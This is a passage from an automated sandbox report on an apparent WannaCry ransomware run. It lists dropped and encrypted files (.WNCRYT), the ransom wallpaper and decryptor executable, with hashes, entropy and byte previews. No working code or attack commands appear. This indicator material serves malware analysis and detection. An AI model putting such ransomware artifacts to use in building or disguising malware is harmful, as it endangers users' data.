SSDEEP:	24:bkoxaxQGvSkmLIy0kt1T71WlUvGkzKK4Kgv6DYD0gfFcWgLYVmE6DmTAE1ngdUAA:bkoxaxZv00Wh1W6+0KnK4r0ECWAYVmFe
MD5:	6546E4D91E9189BC7BE982844E773201
SHA1:	183DFCEE38A8EBCB36A6BDB7DD9C4AAC634F285F
SHA-256:	C1BC688F33E069606DCB7C14D4F1721DB40C7D6295135AB51D9C9066F13A1E09
SHA-512:	D3B7761255BFEDAEF3D5B5A7E7E962365B68C937F7866CA9CF85EDC2F9C5996AAA983777E4D830C2DF7FC30A13031A882B8DFA8DA2CB7330582F7430BD1559DF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Z.;....1.q..`g.....\.o{o3.pBk.......d.7.>......1.D..%..L.in6...ggm......F5'.u..K=..wL...C.Gx_a.9cL...{....o%F`..J7..4.....212..Oe.>....u7.....0@.....R.....).x...#..Wu.....-..w..^C..~.'9....M..Z&...Xn...Z'.q0G._..S.K.......o......L."&^.\I..h............f.8E.].[.C....z.......o.....[^_.jK.Pmr.k..C.i..>....2......}z.XSm.xb<..........r...Pv.......[[G8...K.s...UMr.I.4.&!.g..d.m....s.QQ.P...}.=\....PWZ..#...j.D.. .Is.g.M.V....%.F.H..MO...-.`............#..JX.~......K.....+7.2.z.1...r..t...7.-...1u..f=9l..}F.d0.fr..,..oy.Ix.Cv3......vy.X.%(M..Hs-.ZT..8...\%2yG_.".Sq..g\x.F..ag.....M..}...f.[.i\|..C..Be .%.a..D]z.s..C..M..i..<w=.u..D.....(..>ow/.';o.VT........?Rz....p.;.B...0R.....]..,. &....Zg}..............>...Q..b.....[....=....R...I40.%E>.u....t..5.b.u...2.6...]cl.G...z....i..>n..#...1e.#)Ox...V\,..I..$.jz.s....`(..7:\|KZf.......u...M7Ki.\.hR...W.)V...V......].~]u!a...R..".)......./..*.Z..:y9..89..P.....[E..8[.....A)e.Z

C:\Users\user\Downloads\GIGIYTFFYT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.85497523997455
Encrypted:	false
SSDEEP:	24:bkGVuPMP72vANSXJOTLnmrnlleONJmrHTGltO6tTmWIfKQ/WrwpGv1:bkGVZYAsZqLmrlleuJmrHgOuTmJKQ/te
MD5:	5AF2F19C6D5C47EF057F0B32316E14BA
SHA1:	5C9279FF07AE8677E668977FC830BB2D6BB219C9
SHA-256:	903D91F7BD9EC8879C86B5E4E4333762AB0242628DE181D7BE13EEC701E52453
SHA-512:	DD9404B4245AA3A0317B959C39774CF2EB1DF9B9DD81AA8D47CCF80673B1DA10FCB22373FAECE4AE79BDA1AA1E2C1BC3FFB9884E84FA34395D6CE95B2C3DBFC3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....(].O.x3.Z.........m}....f.A..%.'b....r.G.k..U.<.ND..a..C]...:C..}.....Hj....{.. .f../[E.:..\.Y...be.Y...U.}pD]..Q...B0.'N.F .(..........x8)...)4.H.'............p.......P..sn.K.Af)W.Y.I.#k..Q'..G.q.t......F.kin...E.{[8.M...%..:.D..-..U:............Y.f(...a..._...X.\20...".6..f..6y.+....Z.v3j..;\.....s.]...Uk{.^i3......Li4..J..&H.....l...>.z~......Y.1vK.(k......2.j..r^>\X.).J....3X..5EC.#}.IY.9'.M ?.....L.....i0vd....m.~'.y.T..^>A.[w..^.Z.XO..T....l..U.........V.C.....~..e..v.b...))..B?'..;..7..{`...D@]o....`f.(.....9..K.r..m[........Z}.5...P.............BN.9......6.#.d.P ..d.a......M.l..O...G.R...5.0C.dW.qa...U.?.$?o.~\;YxiG.O2..F...,...,.....,..%..'..S.e..E.qb.Z..F1..b...>....sR.i.5...k}..6.=JW..[.<...,R..E.3;..]w5x...$...am..f...mw._....E..OM=.n...31..>..9x..sa.p.i._.=y..3)..)....=..c..]...a/.1k..$.9..G.Z.... ..."..6. .uKx....z..}=1........t.......I{......P..io..a8...2c.6......g. =?...... .....U..p..6.^.<.5

C:\Users\user\Downloads\GIGIYTFFYT.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.856363829056131
Encrypted:	false
SSDEEP:	24:bkVGz3gu4DJUUoR88MO2X2CR+SfJd9TOW6NIO7R23DImvPcazrD2W/6WV:bk+kS/MvXPfBOW62O7R23DaazrDp6WV
MD5:	C63FFB1F0D715D06850F3CCFB0E30649
SHA1:	C5207625C7972A7013CDEF9194AD4EC83E9F582E
SHA-256:	C24C998692908909D514BCDDEC66B4B5A87F529364CBD90D22A1651F7AA23685
SHA-512:	ABF2B48D4732A9A05A007021C648639157628878C6657EF3EBDB654E394B52B21ACB8CF9BA9D7A803B22A0DF7831752FC28F859CFC38EEFA145E718EAE4CEE27
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....`..<I'.Pn...h...B..&.....(E7.u...b...:.X.v.z<G......dvhX................&.xOJ=Mc.@....3...e........CO..`....jU.../[iw.......&0zDu....X...3...r..m..r....a. ...6.M...".T..c....C..6!....q..Y>k.D.S....w........pk.._5..4}h.$....!j..d>'e....n,P..S..............g..a.. .........m..o.'...@..,5.7.u.$......k..bx.o.X...5....9..+..l..S....\|....;.a.T.'.s.1..W..F.L`).%K.Q:.6....u.......d.c.)..L.,Yj.6.b.PsGt.&....4.. .......K...........H..:vj.....U......m..Y...u...A9.......~..t....a..\...o....-...^.T....L..h..:...z......#....45Z..V...%~..-.?...-....W.{.+...XQ.$6.N2.Y&....p...bg.. .........?.S.Qf.....w)O.^~\|.+.,...7.....B....4[.k=....: ^..a..dE.2.3.9 .v.x[...4.8.....2.2.JJh.Q..p~..l...t.A.lE.....I.b8....... ..w...u..M..:W..e.92.........'.0....T.9<\|.^.0.z5_P.......N...6'D..d....<..E...6.a.......y.kG..%...1-:e...r.^[.$..s9x.l\|/..Bu..-./...[X.+..t:.h..\.....vC%....,.kkF.f.@0'..'..W....Y....8.._....otu..i.....S7q\.....A..-\|UJ.D.......j.(%

C:\Users\user\Downloads\JDDHMPCDUJ.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8581828260829925
Encrypted:	false
SSDEEP:	24:bkP12acCwxaYJ7Kgak8lH+6xpbyqmw8j2OP4n9dJ5N2CDXJM6874jqx:bkP13wEsg+6ZMP4n9dN2CDXL8Eex
MD5:	0C59314171A59FF10403E443DECE35EE
SHA1:	A5765160A5D96CBBDD67195F115B891B4CA3A183
SHA-256:	ACC1EFA8AF03EE463F7241DB58CACA096AF18A1C3FFACC9722CC2BE53E5B4FAD
SHA-512:	C975A355866C2F085B6537364E559FD3668E425BD227D62E658DC2C2159279CDEC818D826CE7FC691C57E2650E5236B96F3C332AB3A082DFB48CEDAED74E9177
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....&..7....{E1....K.V}p.....6.?m....^.....3.d.Q.mt.ZEK.@.3.m..V.~?C+q.V.$....q.......l.b.8[...i..!.O..2.....M...7...5..P..wZ.PD.{.Si%.(X..i..N..?.c}Wj.."....R1:.....'.b........7...U.?...%...hj`....`...HWd..0...h}.TfA!.+.&.......1..rj...6...................a..c......lj...y..............$.1..`!F..w.]BF.7..V.O..+...Ys.p...?.j.9.....@./"....pu.......q...U...G{.D..S'.m....-.)>.mat.8i..0..~P......b........`.Z.O../.m..W.....f.%j..^=.?u......ER.F.Zv$].t.Z.RG....t....D.2."3.....F...dt.T.e....$nw!.z..........\......,..t....@.;.e...%P}..@/-.c./).H...........[.u...a.+...p.........Z.2...c.9S>:...H.....%....>.%.w....._..Q..j?.\|9 ..JS.....2.7..{..e......8..ae$.W...r.[...N0...+..{.-..n..u.}..X..?<..u..!yDn....I...jfv..x.`p0D@/.7..h......../...>.. .:E.*.{>.......L.`1.(m..`]..}8.....EV.X..S.I.ldy.~.F.T.(.B..(..z4c..z.......^.A...B}.p:..\}.0..q....{. ..}s.]2.+..3.y...qn":..oOF~/d...<.Z.\S....}....[.:.l..s!90.....'....v..`G.......Z=

C:\Users\user\Downloads\KLIZUSIQEN.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.830905604842412
Encrypted:	false
SSDEEP:	24:bkEpRAUiByc7DgxUs6wiCV1LnW5Ak34aRWn52hA76IcDBj:bkqRAUiByAcisDu5Ak32SCABj
MD5:	FE92E5F24ADD7F2024A7EA8F8995F77E
SHA1:	568CF444D78617F23F5674774C719E02A82A7E94
SHA-256:	B21F476778D37824A46C28D24BB168BB52EAF0BF2ACAAF924E8EC9293232DBBD
SHA-512:	31903D34DC9102E2B2C117B84CD8FB2ACE3AA1370D9CCFF185B86735FC9026CB9EE27098144DC88E26992479EFFDCC5D876EA9FB589E7F138484E09010413FAA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......\...R...>N..A.....c..u..C..J~3.3F.s.e;0.Y..IE....\|-l.b....>...r.;T...w..&.=Bx.%....Q7Z.+.wN..le....@.....e.Y...".a0$..0.T..V.)J....o..Z....S. '...nxS.t..A........X.h..........5..7h...'..Q.........o........6....G..$.3..d.$$f...k...`.#5.E....................".C.\|...O^.....f.p..D....t...).XdL......H.....I..B..n.`...X....#..0.W.....W..D.e..^..E...._V>..Y).zU..:...b......3...QD........x"v .........P...C.y.n.......#.......M..D..=.5h%..6.,.!F#.E_}.c.r.f.QtU...lR.Sc.q{v)U..!{6.'.m.M.5_.{...q'<...h..ruc.9......&.j...Q* r....`.OR.c.Q....!......?....w8J..8.E.W.h../#.].`.`..o. !b..[<.D?..8R.h....T....#.7......`}..OG.T>)>..R.G.o<..al..T.F.M5K$s.u..!..K.......lq.`H.FXm-....~C...E&^M.B.2.0l.F.....$.....Z'.w.....V.5H.;d........E3sp...P.\|J......Y..]J..m.[pAd.d..x........f..'....-......z....$..imx......d.y..m....;..q.e...c..;>g..&..?9]R..}G........:a.Q.!%...%...#....H.:6.e.D...~.kq9c..PM......f...g.$..ayG......S%\|.*......7_.Y.../...&&..t..

C:\Users\user\Downloads\QCOILOQIKC.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.854160681306688
Encrypted:	false
SSDEEP:	24:bkHHo90pPCcZ57DD13y55x6aI74SWSIx29eSHoBvJoplhrFPIVy5I352TuG0TfxN:bknoupPVD138Nwefx29JWJo3b5Ip2TuN
MD5:	F6C90DD79FB69508C3763F24B496D905
SHA1:	375A73C90442D03011AE3B36A5028E0B2D0BAB46
SHA-256:	CAFB99A9C3C2868C8C8EFDCEF23DFDD880E5DFD15CB03BE6928CABC94C1BE096
SHA-512:	BA6630EDDA1F185A44ADBD980529B7281F63C66ED9395B75291E49FECCC8FB047BBA7DFBBF3F10319E20FED05F63FBBF9F3808C3144CAE2BBDEAB5E609BF0B8C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.............)W/d.`.\|./....K.6n....i-..S~....?=LC..X..G.....~s#.b.#7.<..4.6.....m;.=...Gn..D.n.J.65..P..$c...)....).GD\..h...AY..ld.^.vz..`....3.v7.H..k........97.!..I....,c.]...P.t..$G.PB!.)...HM}'..>.H.X.N....[...,.2.m-E]\iDe...y.f...t.Th...............X>^......j...O...S.B!F...)..R.}H..i#....HS.....&..F...8B.F..J'V..Ul.\.f...V<9..[.y....?...,..bb...<.w]..._V.X..~......L....i.>...$%.U.\|....;...8.{..\|......m>..qn...%...J.yc-......i._.X.....T......L...{.K..zZH..Iuf2....mIWbE.`&Z.%^D)....*c.>.....l..l8.9a!.E:.O.........P..H0.....I..+.....H...4..?.....?....G3.c..#x.d.....J.;..S~..._...1..6a.i.7cPp.A..VQ..7.XcP5..B...X.t.....1......:"K....H.b.N.%....&.-.o.R~<..x......~......L3..D....iD..tV.[.3..jN.4l.....<.=.#m}%.b..\........b.U.\|J-.W....._%..M.\.l.N..j'.b.......8l....r.3.QT.B}.2.......#..L.H.....l.O.U.%T.. L..j..k.c.$`(.........N.......[.Vr.J..>..qK. ."...%./.PJ.BQ.$..f.....v...Gv...R..gI..'....w\.."....M.9.......7.T.Y.h

C:\Users\user\Downloads\QCOILOQIKC.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.81210777788863
Encrypted:	false
SSDEEP:	24:bkSbAHbbvRPU8FCk1BpGQAn8GoJptFKeNSrHtflppsXqZ444icbrzLyb:bkSk7DCCTGQy47ENfRsaGPicbPU
MD5:	60E6898B6C7E8C3ECBD203AAC784D166
SHA1:	015EF5F87FB10AE4967F46E7297A3B3EC17943A5
SHA-256:	6AF7D19E7EC0FC5E71F0A91396A1AB4F39BE9AA10A75C81A75CA8E84E96105E7
SHA-512:	A91BD17EF729E8A745B19011331DB47520302EC7C3ADE3B3EE55539FCA826525ADD3B1FEE99FA44E565F48577789222F633D8929091D3ED81FC2856F57C744D8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....pgNK..Z....\..}...)k{.b.........P.H.qg.....:.p/..L.Ycf`.q..o.....U.....Em..B......:#...sv....S.\.o..).R..K.._j..wXi.1.N.`[.I....g..U..^c.I..I.{c.........H6..]..T..0o...{3....%^..P..i$.z...S{........'%0....'...Jg.]vk....Eu..F...;....................6?..>.]....s..E..6.$nG.O..O.T..L.Q&+2d..B.U....?..u..l..Y.z..-).4..T.H..?\|..l.v......M....WY.z.c!.dOawy.<E[Q:.!....@.\:......R.-.."..8.........?H.........B(h..ZB.R<.8..$7K/..H..@.y.%..X.{.^...u..H..(.....:>..JT.....$A.N.U.........[.N.I..MA.v5...NF..w.F'0B.r.'I.o2./(o.x...u...W....... CgZ...KN..$1.../.(='.Q7..:.2.z..vf....1....!.K.....i..... ..".&:e..N....;UdOB.U...4:h....Y........`.Sp-.#...^)a".Bm.h.......MF.b..g...N....`.3.2.nz.....^X..#y.{...K..U.....lZ....T..-%h..s..F..5PHGZ8"q]......\|.g..!.:.p.{.qnjE.-..6.F.2.B.6...m..].YP]....P..`..(4...jFa#......K.%.<...`c..',H.P.Ry.V..GK.KW^.U.I..O..2.K......[...:n+..}.(./..I[...pS..E.Mb.]/..8..E."..hKU..h........T................

C:\Users\user\Downloads\TQDFJHPUIU.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8379940164816
Encrypted:	false
SSDEEP:	24:bkgdaVjqxqtFRAaoNhQ6JgZMDLItiTcQsvvTV/iJI501GBbpjW8HOz:bkgsVjLtFR1Q66JgODL8mo3Tj5jRhVu
MD5:	71847DC9A82D4FD1F0B27A837DA0DEF6
SHA1:	41E03319AA2DE983A6DE0C719EB878F1D71637E8
SHA-256:	CCE26CE8C99398B650D0A386DFC0EEE60F15594ECF4A563DD934B58F160FD075
SHA-512:	445BDD5E4E5B47724CF818D050A32F533C4311E780B4D37DB9CE53EBF1E622B1563C5385BB13B4C0BD8898CB744EB1C491B9E6D6D1EE76727B1CD79339966AC5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Kr.4..94..E...f..cX...s.@^.+]:..n. ..l.......#>.a...~>..Mx.4.l2..`..X.y/..K.!oi,.2....)Y......]v..H.a...Of.\n.....A..?.......m.1.h}....N1.l^..%.....G......":.#`...:h_.)U.....Lw....0S..?.d.w.;E.......$..y.=/).r.R.m.-.7.....^..._.~_..Y.H.F.\..................m.y..-.e.!Tc....>.%j.o.~gh......\|4...I.N.....O..xS.]q.&.!...>.....)..............L;,uf.s.......1..4U.3#...R..c.+.z.....z.-_.y\|...../j=....lGk..K\|...1w.-. ..5.E&!..I.&...6.'..oa..z.W..Yd.<...B[o.Z0R9...(........s...^%Y.....z....#C!...ST+.9..Z^J...PZ...(..1.\;K.d..)NZ.).k/H."a6.....+4.9;.....g).<...V.....N9ss..:../.j.. .R.>....\..mb....^...Y.2qpStE....[..g.k5..9...d.....%..W.f.`.i....`.[o.D-s..Uf.`.z.........W.J.......P...I.u8.."R.......W..(.z-.B.\|....Wv..7I...#.#i..l.tJ.=Tu.w..R._.xM...Y..O.....c..G.......c..h.....D..mCN..w].b../O.....B!..o.>R(L.(?c@-....)t.ei..(.x.o..f.]h......4.OIHZ.4MKJ..c...e....&l#CY.J.w.-......M.LI.p...o...T....}.\|....,..k*......KJh.a.u..@.

C:\Users\user\Downloads\TQDFJHPUIU.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.847803354935925
Encrypted:	false
SSDEEP:	24:bkhpK5Hgk9qPHA2OX18KvQ1EEXrM+ajNhFWdqjgdhI4gqeNt7dHpngOiS7ZAuQX:bkhpK5X9qYll/I/54NhkdvqZqCJdHpnO
MD5:	FFCB63A8FE60AAB2399C8029BD9F51A2
SHA1:	FA50D15A607C53FC3D26A66C5E2759285978FDE7
SHA-256:	6F1DD41C15632BB4B192963E5ADAB645027F400FC74DA75D9E3024A1E71A345A
SHA-512:	BFC6FB5422F5DAB0F961C9AC42B69AE83A30114DE381FAD99ACC86FFE7E5ACA2E5DF73896C60038CA441DB571706686520DD2F2D0A23A1756B5693ACA0961CA5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....a."Q.....e.e1O..Y......Z.......w.wOD....tPi..H5(.......%..dJ,NKd.j...#..>d...=hBz.\|.,.tmd.......2......T..~_......,..c..g.(.3'...(.6.[.r.H...D$...J.ew..e.v.../...&..f......ikO4.1.R.i..M...d..'A.."'Q.C.X.B..^l..sc...J....s.E../...9.4...w?(..................J{..h.$T..[Q.tum....hz....c.....s..K-.....(S..3.t.=.QB..k.B..Gw.Z...."\.>.;u.Z..5~,Va..^.0..7V.P.xU.l.......~V.bd....C...2......^P...p..........5.......P..v....pT........B. ?nd...d%(.X\O.2.i.<........pO./.......l.uG..%?r.o..cM..v.0.v.}.5o.H.u..B...V....)#<z..`..........j.}..+.Da..@..:..M..#..q...Y`.v..w6.3..._.l.....x,c..&V....@....Z.....YgO..\o0.}'.PLB.G..PGO..w....).i.3<l............).7...iw.....m...\|?b...OM.(,..}E.WQ.l ...W_. &..P[m_~.X.?....~8.u..y....x,Q3M.!...8..S.a.I..LS.=.S..a..({.O.4;...PYC.5X..n.P....J..Dt.E.o.G..G.{.<.^.)Sr...b...l..u..rP.....86.....].X...^..n2...4....L.jk..........~l.....kK.d\f..YY.....{B;../i.?'.a4a(#b...r.....k.trY..&...8X

C:\Users\user\Downloads\UNKRLCVOHV.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.864842887698143
Encrypted:	false
SSDEEP:	24:bkckFk8VmRz3iYr+pb2YRKedlNvLa3APrtyotIaUx23FAYf1H8CuJ:bkckaprKrUeeAPxZ73Z1cCU
MD5:	BE46A83DE155ECA18EEE2F3D8D297C14
SHA1:	71E1E785FC7273A8F05A0598A3992248FE3DB9BC
SHA-256:	CC4C7A79584E2803C6CF00820FF5601E94A1D8F444C1E754EE257E75B68AA2AB
SHA-512:	305486B97635DF203317DFFB594268956048FA764241FDCE0F0225E6907CD689A3F3C34F32B8EF32A720C07CB2BAEE98AEB4F278FB23AD8D7BD101C7A2D0CC06
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....X...i..HQUX.B.......K....S.K\gM(o.]b.>....a!....z..U.O.......R..( .U...."a..K.....}.;<..8.=68...K:..^..C.....8..;.".E....P..y..0...e"@..p.lRApu.(p.s....Q.C.+"......o.t....p...1...b.M....]...o.8"..O..-...Cu.:........q.a...B.&.h...lz<.o..$.`]z.............b .....w............`...[...X.#w.M/W...M..O....b......)..%.).....2.n"..-J$..X...O..;W.p%...8..j.j..R4q,.6.vX.S?..W..ay....X.H.]_K.....`.....6q.^..E.].{......JsoK..44.....{\uU0....h.....B~K.....?..`wR.....KG2....\....-%Z......{.arN"f...^9..[.(N...X....../[...w....S..K..#....^:.....=.v.L...'.._......0C{Z.T.....E^*.<....D..d...o.....vg%/.8t..L...Q..4[z.%../..K..Kh.\|...0...>..:..Y.^.....`....)..cf..r.(.]I).x......MF.d....].$o.h ..>_X...oQe....iu..Pa..6.......Y..~..8$.u.V1...[.`....C...,./.F.E.}...Bv.....{.m+Q.y-.".'b.F.H8.;.S..p.......{Dc......16b..f...F.5..V.TO........j.<6....`.nF.....O..J...g......Y....2..E.^.-:9q2\|\|.D.......)6...{.F..?......7..;'M...a.=.T).)5. ,.;..]..O}.......g

C:\Users\user\Downloads\ZIPXYXWIOY.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.85137226627166
Encrypted:	false
SSDEEP:	24:bkoiYPk8IrT1n8DHdgAag7UN9qf/ejkfhQPpuW5tyB5FK9tSW9vE:bko1sT18xXt7UTIQRuWHfSW9M
MD5:	A87C80EE2C7B649E2B9CB0FFCD5CAE4E
SHA1:	9F692C31515E98CDE45583989951E2887B684761
SHA-256:	C24BCB61AB824E177ACE8C3EA626261EB9A26F59487DF39BE0F3A1D0AF5DBDC7
SHA-512:	BA8B5774C0CB864ADBDA093359D63DA9C0F02BB18336E14E191C910D39D71BA9AE44D2A6FDBB9F27635923FBFD807251F58C1C70AC19BE19E9B7066CF8FC03AA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!............9.....i...../.i.......^......+I...c..x<.....!.F'..M...jT.!..dE...~X.3...X...$ ..Z.....{...._w.$.._.F.@h..EX@ =..<...LzV..\.......V+.j.%.`.xk.e1%.!.c{.w..].....x!...Af...A.>5...Mr{.4...{M..Vvm.p.....R.=\...`..v:L'...E..'...d...:..U)&.P...............hD..8R-G..{...T1e2..I.PR...#pT}A..W.?..\|....tS...;..-).....gq\.g.@.....6o\.=.C...8.x.:...."..)...m.....t....<#...].Ab..>,..8..e.....g..k....p.....=....m.p.OWC..u._.&.;....A..n..ep...rv;.-..8h...T.9..r..@B...a.GWu'-@..L.5........2..K.'...K...-T......a...}.7.........!A.vw....>e..?.u..uo......).'..k..o..'.dZ..K.)e ......-.....A.ce.....y=O...X.}..c.'....e..dS..&j...9bG..?...O.0.\|.?.2f.k~!..9...Qby8.....$8..l......y..H._........D.)..{D.z... ..........N..W.......<.5.x#....m..:b...D.L..s.\|...P.,^..-."A.).D.gG.L[..8.V..l...4&....r..B....-5....0.qh.O...m .D9..x....1.....o.*1<.....[t.?......Sg..~..t6....".R...}..?/:..i...{.....(.G7.klT...f..`3/zC...z.?C.Y....,.W..I.B.u.^3..-.(.B.].

C:\Users\user\Downloads\eicar.com.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	360
Entropy (8bit):	7.314816613442435
Encrypted:	false
SSDEEP:	6:bkEJX//28yhpomA0RTLwlUc+LCKdx+nxBe7Boz12fEKrQHpElJukB9T68EJs:bkEk8goIRTMlCCKdx+nbeOiE/i/X28ES
MD5:	E3AB4FEB54AA5EB8A6499809900BC58E
SHA1:	6DE7234403C12A6C3185AA98433F7652E6B9AF09
SHA-256:	7AF8DD605B21C39E3E38B71ED986B275FF531457AAD560CC26F5C0240A70BFF3
SHA-512:	6BC757040D60719740ED847F492CF4950497395F93820B4C4E1421CE8BF0AD2FA19B6F35A41EEF63814D3686847C21EDC6AC23D14717AAD03B1024CD087CBFB0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......n,.T..-...;..hV-7Y}...s....{ 1.\|.....v.EK.D`m3.....3..d.rw...x./.g..H6.]..hxg-oC.T...[[$...?..`...f.v....o..M3.u......./(ge..q7o......0..P1.h..Q.!......O..t%...4....a..)...E..}..z..O<.a.P..H.....@lf.&..M.Jzf'{4..w.C&.r..3..c..........u1.tk.....D.......v.....x.3.......&\mD...+z\|.....`..U..;$.O..U..#...c..S.....-. ...#*<e..

C:\Users\user\Local Settings\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366674255160830.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998216087858021
Encrypted:	true
SSDEEP:	3072:KEnqpA+dx3aFgbNDYpT6MMjdw5t72Jz+br3kcZlhreP9oQn:LqpnJaqZDC6VjdAaz+fkAeVoE
MD5:	98AE79C74302E7270C57084CBAB3C4E9
SHA1:	84CBAD9EDD1F83DD1D9049EE274D388CAB18CBA8
SHA-256:	BF1CA48B40E94EE3CDA660F18175C84F11F7A0361C873C460822AA2C523BA376
SHA-512:	4551EA79D9A4AD92728DCA5BAF7F5EAF7351CD7DEE3E0A11E5DD02B3F50A4BCEB90D5C32819EF6F2A3A962E31CBF0CFB7E1C55B41B141C71D4383E8ADD521BA9
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....dL..j:.y>..y.IU...WG5\|.]...po.\|KcT..O.w.[...s......../){9.=...M...s.............K.....V...M.....7.^\.P.z.G..qm..{P.....U.AF.......Cm8C5.........m^WV.m..v.hb...;...C.{....M..J\...>.Y\|..<,!.vzOB...T........"..o..i.a.S41...Q:I)n>....J_#..z.r.....#.........cz.A.a.Yo6..z....c.......R.I.aJ.b..I.uS...5Vn[....q.)k..........5.e..E..K..O.-..B...O.?V.F.D.W...}...AM.3.j.x.-pi.N3.]$.\6....!.vv.X."/.{...#.<..2.d.\.o...>..)........h......N.E.TcT..>.R.P.@.Ka...G...v....dg5.g.vh....h.......o"{.v.D.........s.Y.....=.8....t@....>..W1.0....9>.gI.....k@.>q.<...Z....I..."....6.p$9...!rX`.....r...q&nvY.Q..5.6.6!....%-h....\|0.Q...3&..M[!.].{....ph.;._.4..-.N..R..sk/.}....#..C.u4.!..<..V).Kp...t....S2. ..........r.$......w..+3....t...d....v...M..!a...9...2Rg...9sjXe..........2O.........X.j.`.].#V.....u..r....(............O..w..o.2.~...}..E.Q.;.....z...}..........<.`..................0..4......5..~:.\.Z..c..T....G..V.J.q.'7e.".....U.q..*.:..sNR..9.+p

C:\Users\Default\Desktop\@WanaDecryptor@.bmp

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
Category:	dropped
Size (bytes):	1440054
Entropy (8bit):	0.3363393123555661
Encrypted:	false
SSDEEP:	384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
MD5:	C17170262312F3BE7027BC2CA825BF0C
SHA1:	F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
SHA-256:	D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
SHA-512:	C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
Malicious:	false
Reputation:	unknown
Preview:	BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Default\Desktop\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\@WanaDecryptor@.bmp

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
Category:	dropped
Size (bytes):	1440054
Entropy (8bit):	0.3363393123555661
Encrypted:	false
SSDEEP:	384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
MD5:	C17170262312F3BE7027BC2CA825BF0C
SHA1:	F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
SHA-256:	D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
